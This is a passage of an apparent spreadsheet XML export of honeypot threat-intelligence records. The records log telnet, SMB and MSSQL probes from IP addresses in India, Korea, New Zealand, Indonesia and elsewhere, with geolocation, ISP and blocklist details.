    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d9:9940"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2141"/>
    <x v="2141"/>
    <s v="NA&amp;&amp;219-89-194-232.adsl.xtra.co.nz"/>
    <x v="0"/>
    <d v="2025-04-12T09:43:49"/>
    <d v="2024-12-18T20:37:32"/>
    <d v="2025-04-12T09:43:49"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="OC"/>
    <s v="Oceania"/>
    <s v="NZ"/>
    <s v="New Zealand"/>
    <s v="AUK"/>
    <s v="Auckland"/>
    <s v="Auckland"/>
    <s v="Auckland (Auckland CBD)"/>
    <s v="2193733"/>
    <s v="1010"/>
    <s v="-36.8542"/>
    <s v="174.764"/>
    <s v="4771"/>
    <s v="Spark New Zealand Trading Limited"/>
    <s v="Spark New Zealand Trading Ltd"/>
    <s v="residential"/>
    <s v="TIS"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="ok https://icann.org/epp#ok"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:db59:c2e8"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2142"/>
    <x v="2142"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T09:22:31"/>
    <d v="2024-07-16T22:48:20"/>
    <d v="2025-04-12T09:22:31"/>
    <n v="47"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SSH_H14&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_SMB_H16"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;22&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Kanchipuram"/>
    <s v="Nandambakkam (Poonamalle)"/>
    <s v="1465879"/>
    <s v="600056"/>
    <s v="13.0288"/>
    <s v="80.0342"/>
    <s v="134032"/>
    <s v="INFONET COMM ENTERPRISES"/>
    <s v="Infonet Accurate Appz India Pvt Ltd"/>
    <s v="business"/>
    <s v="Infonet Accurate Appz India Pvt Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_SMB:Incoming connection (103.163.44.227,62661)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.163.44.227,56124)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.163.44.227,50883)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.163.44.227,60514)}&amp;&amp;{Data_SMB:Incoming connection (103.163.44.227,60994)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.163.44.227,61533)}&amp;&amp;{Data_SMB:Incoming connection (103.163.44.227,62500)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.163.44.227,56458)}&amp;&amp;{Data_SMB:Incoming connection (103.163.44.227,56820)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.163.44.227,63242)}&amp;&amp;{Data_SMB:Incoming connection (103.163.44.227,63574)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.163.44.227,62753)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.163.44.227,60740)}&amp;&amp;{Data_SMB:Incoming connection (103.163.44.227,61130)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67a3:2ce3"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2143"/>
    <x v="2143"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T09:21:44"/>
    <d v="2025-04-12T09:21:44"/>
    <d v="2025-04-12T09:21:44"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="MTNL Delhi"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7839:add1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2144"/>
    <x v="2144"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T09:17:00"/>
    <d v="2025-04-11T22:43:29"/>
    <d v="2025-04-12T09:17:00"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="residential"/>
    <s v="BB Multiplay"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d03:3717"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2145"/>
    <x v="2145"/>
    <s v="114-40-43-172.dynamic-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-12T08:42:20"/>
    <d v="2025-04-12T08:42:20"/>
    <d v="2025-04-12T08:42:20"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="HINET"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="corporate"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET: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None"/>
    <x v="31"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:7228:2bac"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2146"/>
    <x v="2146"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T07:57:11"/>
    <d v="2025-03-31T05:51:27"/>
    <d v="2025-04-12T07:57:11"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Ansan-si"/>
    <s v="Ansan-si (Danwon-gu)"/>
    <s v="1846918"/>
    <s v="NA"/>
    <s v="37.3227"/>
    <s v="126.791"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="cellular"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:77cf:f0f1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2147"/>
    <x v="2147"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T07:52:18"/>
    <d v="2024-05-07T18:04:00"/>
    <d v="2025-04-12T07:52:18"/>
    <n v="202"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;43751"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="43"/>
    <s v="North Chungcheong"/>
    <s v="Cheongju-si"/>
    <s v="Cheongju-si (Jibuk-dong)"/>
    <s v="1845604"/>
    <s v="28759"/>
    <s v="36.5946"/>
    <s v="127.51"/>
    <s v="9319"/>
    <s v="HCN CHUNGBUK CABLE TV SYSTEMS"/>
    <s v="HYUNDAI HCN Chungbuk Systems Co.Ltd"/>
    <s v="business"/>
    <s v="Hyundai Communications Network"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1b23:5135"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2148"/>
    <x v="2148"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T07:37:07"/>
    <d v="2025-04-12T07:37:07"/>
    <d v="2025-04-12T07:37:07"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="KIXS-AS-KR"/>
    <s v="Korea Telecom"/>
    <s v="corporate"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:da94:3602"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2149"/>
    <x v="2149"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T07:15:08"/>
    <d v="2025-04-12T07:15:08"/>
    <d v="2025-04-12T07:15:08"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Chennai"/>
    <s v="Chennai"/>
    <s v="1264527"/>
    <s v="600001"/>
    <s v="13.0827"/>
    <s v="80.2707"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:be6a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2150"/>
    <x v="2150"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T07:11:34"/>
    <d v="2025-03-17T09:23:48"/>
    <d v="2025-04-12T07:11:34"/>
    <n v="15"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="445&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru (Krishna Reddy Industrial Area)"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.8922"/>
    <s v="77.6423"/>
    <s v="9341"/>
    <s v="PT Indonesia Comnets Plus"/>
    <s v="PT Indonesia Comnets Plus"/>
    <s v="business"/>
    <s v="Myntra Designs Pvt Ltd"/>
    <s v="None"/>
    <s v="IDNIC-KBIFOOD-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_SMB:Incoming connection (103.229.184.166,55462)}&amp;&amp;{Data_SMB:Incoming connection (103.229.184.166,55967)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.229.184.166,54570)}&amp;&amp;{Data_SMB:Incoming connection (103.229.184.166,55236)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67e5:b8a6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2151"/>
    <x v="2151"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T07:08:30"/>
    <d v="2025-04-03T02:27:15"/>
    <d v="2025-04-12T07:08:30"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H43"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:77cd:439"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2152"/>
    <x v="2152"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T07:04:43"/>
    <d v="2025-04-12T03:15:59"/>
    <d v="2025-04-12T07:04:43"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c7:c6a6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2153"/>
    <x v="2153"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T07:03:38"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-12T07:03:38"/>
    <n v="106"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H15&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;39695&amp;&amp;1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}"/>
    <n v="61"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="BB"/>
    <s v="Bangka–Belitung Islands"/>
    <s v="Belitung Regency"/>
    <s v="Tanjung Pandan"/>
    <s v="1624877"/>
    <s v="NA"/>
    <s v="-2.73353"/>
    <s v="107.635"/>
    <s v="38757"/>
    <s v="PT. Indonesia Comnets Plus"/>
    <s v="PT INDONESIA COMNETS PLUS"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2022-06-16"/>
    <s v="IDNIC-MEGATAMAINDO-ID"/>
    <s v="None"/>
    <s v="query&amp;&amp;login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08_x0009__x000a_x0bx0c_x000d_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.189.207.157,61061)}&amp;&amp;{Data_SMB:Incoming connection (103.189.207.157,57104)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.189.207.157,54538)}&amp;&amp;{Data_SMB:Incoming connection (103.189.207.157,21611)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67bd:cf9d"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2154"/>
    <x v="2154"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T06:54:38"/>
    <d v="2025-04-12T06:54:38"/>
    <d v="2025-04-12T06:54:38"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c0:44ee"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2155"/>
    <x v="2155"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-12T06:40:56"/>
    <d v="2024-08-20T16:50:08"/>
    <d v="2025-04-12T06:40:56"/>
    <n v="448"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H38"/>
    <s v="23&amp;&amp;23&amp;&amp;37755&amp;&amp;NA&amp;&amp;80"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
